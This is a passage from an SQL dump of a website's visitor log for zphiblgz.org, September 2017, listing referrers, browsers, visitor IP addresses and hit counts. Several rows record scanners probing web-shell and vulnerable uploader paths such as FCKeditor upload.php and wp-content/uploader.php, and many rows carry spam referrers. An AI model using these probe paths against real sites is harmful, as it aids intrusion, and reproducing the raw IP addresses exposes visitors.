','Chrome','Windows','5.0.375.99','','46.41.144.31','000',1,0),(10269,'2017-09-03','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(10270,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.68','000',2,0),(10271,'2017-09-03','http://zphiblgz.org/paypal/popup-pomo.php','Chrome','Windows','5.0.375.99','','80.79.118.213','000',1,0),(10272,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(10273,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.177','000',2,0),(10274,'2017-09-03','http://zphiblgz.org/statslive/popup-pomo.php','Chrome','Windows','5.0.375.99','','93.95.100.110','000',1,0),(10275,'2017-09-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(10276,'2017-09-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(10277,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',2,0),(10278,'2017-09-03','http://zphiblgz.org/wp-xmlrpc.php?secret=111','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(10279,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',2,0),(10280,'2017-09-03','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.140','000',1,0),(10281,'2017-09-03','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',1,0),(10282,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','200.125.74.130','000',2,0),(10283,'2017-09-03','http://dverimegapolis.ru/','MSIE','Windows','6.0','','46.118.159.26','000',5,0),(10284,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.181.25','000',2,0),(10285,'2017-09-03','http://zphiblgz.org','Firefox','Windows','27.0','','104.227.167.126','000',2,0),(10286,'2017-09-03','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(10287,'2017-09-03','https://www.google.com/','Chrome','Windows','60.0.3112.113','','73.173.97.191','000',4,0),(10288,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','148.0.53.98','000',2,0),(10289,'2017-09-03','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.35','000',1,0),(10290,'2017-09-03','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','73.250.84.16','000',3,0),(10291,'2017-09-03','http://stroyplus.ru/','MSIE','Windows','5.0','','188.163.72.15','000',3,0),(10292,'2017-09-03','https://spb-plitka.ru/','MSIE','Windows','5.5','','188.163.72.15','000',4,0),(10293,'2017-09-03','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1533.UCZkreSTDn19eSL_6m0XNdtYVpxjPjhWoc-ZPb_U9jsCg2YDNaUhYIpeJnkBpwmJ.d83f2488c8ef8231a71e3a96929fa74e711fd0d9&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YHRNgn3KsbHJbmUkku86_mY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBWM1gzbm1Kb25PYUQyVEptRjZzUlFhRkxHYTg2Vy1LVVZHbWRYRTBobHBF&b64e=2&sign=58b4bbe9243fff6f6e72d4c5d325fe85&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTtc65nNJPkfr3eVC2xOMWkuoag0eBMheQDkLXiqUSWsbro8c41WyBLBofFhfbor3Vz7_ZZAVxUqLt5a4E_EUbZ-JqlexO-9QgHzgH1oxoIjKW_Z8TaUzE28vt6kUZ0gb1&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIK8QfGGT6y0_vhgsF0vAiYAAs02MV5aB2ee3T5Lu-mG_26T1QtcSTUpRcN1_1NTXDQ&l10n=ru&cts=1504487245294&mc=5.25133938695','Firefox','Windows','53.0','','37.110.146.136','000',1,0),(10294,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','219.91.231.71','000',2,0),(10295,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','41.203.244.183','000',2,0),(10296,'2017-09-04','https://xn----dtbndd4ae7eub.top/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(10297,'2017-09-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.22.127.196','000',1,0),(10298,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.173.74','000',4,0),(10299,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.208','000',1,0),(10300,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.17','000',2,0),(10301,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.245','000',2,0),(10302,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.173','000',2,0),(10303,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.29','000',2,0),(10304,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.34','000',2,0),(10305,'2017-09-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.94','000',2,0),(10306,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(10307,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.248.1.85','000',1,0),(10308,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','5.135.158.101','000',1,0),(10309,'2017-09-04','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','185.165.29.138','000',100,0),(10310,'2017-09-04','http://pochtovyi-index.ru/','Opera','Windows','8.00','','46.118.158.19','000',5,0),(10311,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(10312,'2017-09-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','212.129.34.118','000',1,0),(10313,'2017-09-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.74','000',1,0),(10314,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(10315,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(10316,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.10.238','000',1,0),(10317,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.255.202.66','000',1,0),(10318,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.64.212','000',2,0),(10319,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',1,0),(10320,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','198.50.200.135','000',1,0),(10321,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',2,0),(10322,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.164','000',2,0),(10323,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','175.198.227.24','000',2,0),(10324,'2017-09-04','https://mojpregled.com/','Opera','Windows','7.60','','188.163.72.15','000',1,0),(10325,'2017-09-04','http://fr-bearings.ru/','MSIE','Windows','7.0a1','','46.118.154.197','000',2,0),(10326,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',1,0),(10327,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.43.205','000',1,0),(10328,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','91.160.115.22','000',2,0),(10329,'2017-09-04','http://zphiblgz.org','Chrome','Chrome OS','59.0.3071.134','','174.205.1.85','000',6,0),(10330,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',2,0),(10331,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.219.163.68','000',1,0),(10332,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(10333,'2017-09-04','http://zphiblgz.org','MSIE','Windows','6.0','','185.102.136.19','000',1,0),(10334,'2017-09-04','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(10335,'2017-09-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(10336,'2017-09-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(10337,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(10338,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','148.66.83.110','000',2,0),(10339,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(10340,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','87.110.172.247','000',2,0),(10341,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.206.225.183','000',2,0),(10342,'2017-09-04','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','169.50.62.91','000',1,0),(10343,'2017-09-04','http://zphiblgz.org','Chrome','Windows','38.0.2125.104','','146.185.223.122','000',2,0),(10344,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(10345,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.66.156.83','000',2,0),(10346,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',2,0),(10347,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','112.211.113.21','000',2,0),(10348,'2017-09-04','http://zphiblgz.org/','Safari','Macintosh','10.0.3','','195.184.208.7','000',2,0),(10349,'2017-09-04','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&h=ATNXWHwHj7FidrNLc1O4KOEnHhYpYN6b3hgKKIPUWTvlhux4BjiaqbxVufKHb6PxYJxDqQA8WTWkNzlnnSQr47zx62KCdaCKQbXURPPWEbMCHol8Kq5Qc_PJK2Y','Chrome','Macintosh','60.0.3112.113','','173.252.95.26','000',1,0),(10350,'2017-09-04','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10351,'2017-09-04','https://xn--d1aifoe0a9a.top/','MSIE','Windows','7.0','','46.118.158.19','000',1,0),(10352,'2017-09-04','http://technika-remont.ru/','MSIE','Windows','7.0b','','46.118.158.19','000',1,0),(10353,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',2,0),(10354,'2017-09-04','https://emerson-rus.ru/','MSIE','Windows','6.0','','46.118.159.26','000',3,0),(10355,'2017-09-04','https://www.google.com/','Chrome','Windows','60.0.3112.113','','73.173.97.191','000',4,0),(10356,'2017-09-04','http://zphiblgz.org/','Opera Next','Windows','19.0.1326.59','','155.133.82.64','000',2,0),(10357,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(10358,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','60.117.49.129','000',1,0),(10359,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','78.60.41.167','000',1,0),(10360,'2017-09-04','http://zphiblgz.org','Firefox','Windows','40.1','','125.163.112.251','000',1,0),(10361,'2017-09-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.87.185.45','000',1,0),(10362,'2017-09-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(10363,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','24.200.124.9','000',2,0),(10364,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(10365,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(10366,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.244.74.78','000',1,0),(10367,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','79.10.47.28','000',2,0),(10368,'2017-09-05','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','45.76.22.222','000',1,0),(10369,'2017-09-05','http://zphiblgz.org','Firefox','Windows','51.0','','45.76.22.222','000',1,0),(10370,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(10371,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',2,0),(10372,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',4,0),(10373,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(10374,'2017-09-05','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','46.118.159.26','000',4,0),(10375,'2017-09-05','http://14b.info/','MSIE','Unknown','6.0','','46.118.154.197','000',5,0),(10376,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(10377,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',1,0),(10378,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.177','000',2,0),(10379,'2017-09-05','http://zphiblgz.org','MSIE','Windows','6.0','','185.135.80.139','000',2,0),(10380,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',2,0),(10381,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.206.225.183','000',1,0),(10382,'2017-09-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(10383,'2017-09-05','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.179','000',1,0),(10384,'2017-09-05','http://zphiblgz.org','Android Browser','Android','4.0','','104.168.144.151','000',76,0),(10385,'2017-09-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.60','000',1,0),(10386,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','154.16.149.35','000',1,0),(10387,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',2,0),(10388,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','88.178.241.234','000',2,0),(10389,'2017-09-05','http://zphiblgz.org','Firefox','Windows','3.0.7','','169.50.62.91','000',1,0),(10390,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','31.5.189.201','000',2,0),(10391,'2017-09-05','http://zphiblgz.org','python-requests','Unknown','2.13.0','','54.161.80.171','000',1,0),(10392,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.177','000',4,0),(10393,'2017-09-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',6,0),(10394,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','145.133.215.181','000',2,0),(10395,'2017-09-05','http://zphiblgz.org','MSIE','Windows','8.0','','3.76.125.141','000',1,0),(10396,'2017-09-05','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(10397,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','41.65.35.2','000',2,0),(10398,'2017-09-05','http://zphiblgz.org','Chrome','Android','49.0.2623.91','','174.204.1.244','000',1,0),(10399,'2017-09-05','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.111.96','000',1,0),(10400,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.132','000',2,0),(10401,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.39.249','000',2,0),(10402,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.244.72.200','000',2,0),(10403,'2017-09-05','http://zphiblgz.org','python-requests','Unknown','2.9.1','','220.141.160.110','000',2,0),(10404,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(10405,'2017-09-05','http://macrotek.ru/','MSIE','Unknown','6.0','','188.163.72.15','000',3,0),(10406,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',1,0),(10407,'2017-09-05','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',1,0),(10408,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(10409,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',2,0),(10410,'2017-09-05','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',1,0),(10411,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.107.180','000',2,0),(10412,'2017-09-05','https://via-energy-order.com/','Opera','Windows','8.01','','46.118.159.26','000',1,0),(10413,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(10414,'2017-09-05','http://zphiblgz.org','Firefox','Windows','29.0','','181.114.9.26','000',2,0),(10415,'2017-09-05','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','137.200.32.54','000',2,0),(10416,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',2,0),(10417,'2017-09-05','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(10418,'2017-09-05','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','198.51.197.174','000',3,0),(10419,'2017-09-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',1,0),(10420,'2017-09-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(10421,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',2,0),(10422,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(10423,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(10424,'2017-09-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(10425,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(10426,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',1,0),(10427,'2017-09-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.20.55.18','000',1,0),(10428,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','24.56.253.172','000',2,0),(10429,'2017-09-05','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.43.182.240','000',1,0),(10430,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(10431,'2017-09-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.247.72.7','000',1,0),(10432,'2017-09-05','zphiblgz.org','Firefox','Windows','40.1','','52.211.229.193','000',2,0),(10433,'2017-09-05','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(10434,'2017-09-05','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10435,'2017-09-05','ZPHIBLGZ.ORG/','Chrome','Macintosh','57.0.2987.133','','178.137.94.86','000',1,0),(10436,'2017-09-05','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.145.132','000',1,0),(10437,'2017-09-05','https://xn--80abgj3a5acid6ghs.top/','MSIE','Windows','6.0','','46.118.154.197','000',1,0),(10438,'2017-09-05','http://zphiblgz.org','Safari','iPhone','10.0','','166.137.240.23','000',1,0),(10439,'2017-09-05','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','35.161.134.90','000',1,0),(10440,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',2,0),(10441,'2017-09-05','http://pochtovyi-index.ru/','MSIE','Windows','2.0d','','46.118.158.19','000',4,0),(10442,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.178','000',2,0),(10443,'2017-09-05','https://mmostrike.ru/','MSIE','Windows','6.0','','134.249.80.194','000',2,0),(10444,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(10445,'2017-09-05','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','185.154.12.243','000',3,0),(10446,'2017-09-05','http://zphiblgz.org','Firefox','Windows','40.1','','121.75.126.254','000',1,0),(10447,'2017-09-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.4.81.178','000',2,0),(10448,'2017-09-06','https://minharevisao.com/','Opera','Windows','7.02','','188.163.72.15','000',3,0),(10449,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.206.225.183','000',2,0),(10450,'2017-09-06','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1536.I8Z-hWnnlNXKcXi4Qfk7C94A7r0MvWFPhgOuNUz-kU-HqIcK6dmfmHpbkEjTzFvf.76b835b260475f57b481f9677368777f7c16488e&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBTaVJzTFFDUjdCTWwtR21ueUYtUEFMVWM4SV9ZZ1JSRnhfX0RQVV80ZElR&b64e=2&sign=9f09558f4ad19c0ac17b413d00992bf6&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4cIHzGuQXo3pLtTltXSXYialPB5VZxANNUPaRCNbZONXe-tdiSfqgjSMyfA8sRIjFlOqk4Pg9e8ztSo-Q2a7NLftXbKaRFtdv5k5kT_CPMKewmYbK2_rIyuBEw2HBQqIv&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO2De438PLg5eyZuVN4ums12I8IyEj-Kfzo95q6F5ECrZDPbSw2DD3rqYve3zetNSAA&l10n=ru&cts=1504679253694&mc=7.14765591748','Firefox','Windows','53.0','','128.68.47.20','000',1,0),(10451,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','124.6.156.10','000',2,0),(10452,'2017-09-06','http://zphiblgz.org','MSIE','Windows','6.0','','185.161.209.147','000',1,0),(10453,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(10454,'2017-09-06','http://se-welding.ru/','Opera','Windows','7.11','','46.118.154.197','000',2,0),(10455,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','111.125.208.250','000',2,0),(10456,'2017-09-06','https://pl-top.pl/','Opera','Windows','7.54','','188.163.72.15','000',3,0),(10457,'2017-09-06','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','185.154.12.243','000',4,0),(10458,'2017-09-06','zphiblgz.org/FCKeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','43.0.2442.1144','','178.137.163.87','000',1,0),(10459,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(10460,'2017-09-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(10461,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.178','000',3,0),(10462,'2017-09-06','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.43.182.240','000',1,0),(10463,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',3,0),(10464,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(10465,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','106.243.152.66','000',2,0),(10466,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',1,0),(10467,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.79.107','000',3,0),(10468,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.61.149.100','000',2,0),(10469,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','47.9.182.220','000',2,0),(10470,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','85.253.49.97','000',2,0),(10471,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(10472,'2017-09-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.122','000',1,0),(10473,'2017-09-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.117','000',1,0),(10474,'2017-09-06','zphiblgz.org','Opera','Windows','8.50','','195.22.127.63','000',1,0),(10475,'2017-09-06','http://zphiblgz.org','panscient','Unknown','Unknown','','100.35.47.77','000',212,0),(10476,'2017-09-06','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.66.234','000',1,0),(10477,'2017-09-06','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.66.234','000',3,0),(10478,'2017-09-06','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','138.197.66.234','000',1,0),(10479,'2017-09-06','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.66.234','000',1,0),(10480,'2017-09-06','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.66.234','000',1,0),(10481,'2017-09-06','http://zphiblgz.org','Firefox','Linux','47.0','','138.197.66.234','000',2,0),(10482,'2017-09-06','zphiblgz.org/admin/FCKeditor/editor/filemanager/upload/php/upload.php','Chrome','Macintosh','57.0.2987.133','','46.119.121.184','000',1,0),(10483,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(10484,'2017-09-06','http://zphiblgz.org','Opera','Windows','12.14','','34.214.49.189','000',6,0),(10485,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','177.198.100.137','000',2,0),(10486,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.17','000',1,0),(10487,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(10488,'2017-09-06','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','160.179.191.47','000',14,0),(10489,'2017-09-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','160.179.191.47','000',1,0),(10490,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(10491,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.20.55.16','000',1,0),(10492,'2017-09-06','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.65.88','000',1,0),(10493,'2017-09-06','zphiblgz.org/admin/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','57.0.2987.133','','178.137.94.193','000',1,0),(10494,'2017-09-06','http://life-instyle.com/eda.html','MSIE','Windows','6.0','','46.118.158.19','000',3,0),(10495,'2017-09-06','http://zphiblgz.org/hello-world/','Firefox','Windows','3.6.28','','195.154.173.103','000',6,0),(10496,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.78.177','000',2,0),(10497,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.74','000',1,0),(10498,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','154.16.149.35','000',1,0),(10499,'2017-09-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(10500,'2017-09-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(10501,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',2,0),(10502,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',4,0),(10503,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(10504,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','203.191.62.118','000',2,0),(10505,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','82.255.93.2','000',2,0),(10506,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',2,0),(10507,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','91.115.104.118','000',2,0),(10508,'2017-09-06','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','216.19.216.173','000',1,0),(10509,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',2,0),(10510,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.131.194','000',1,0),(10511,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',2,0),(10512,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.177','000',1,0),(10513,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(10514,'2017-09-06','http://zphiblgz.org','Safari','iPhone','10.0','','130.65.254.12','000',1,0),(10515,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','201.215.219.50','000',2,0),(10516,'2017-09-06','http://life-instyle.com/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(10517,'2017-09-06','https://schock-store.ru/','Opera','Windows','6.0','','46.118.159.26','000',3,0),(10518,'2017-09-06','http: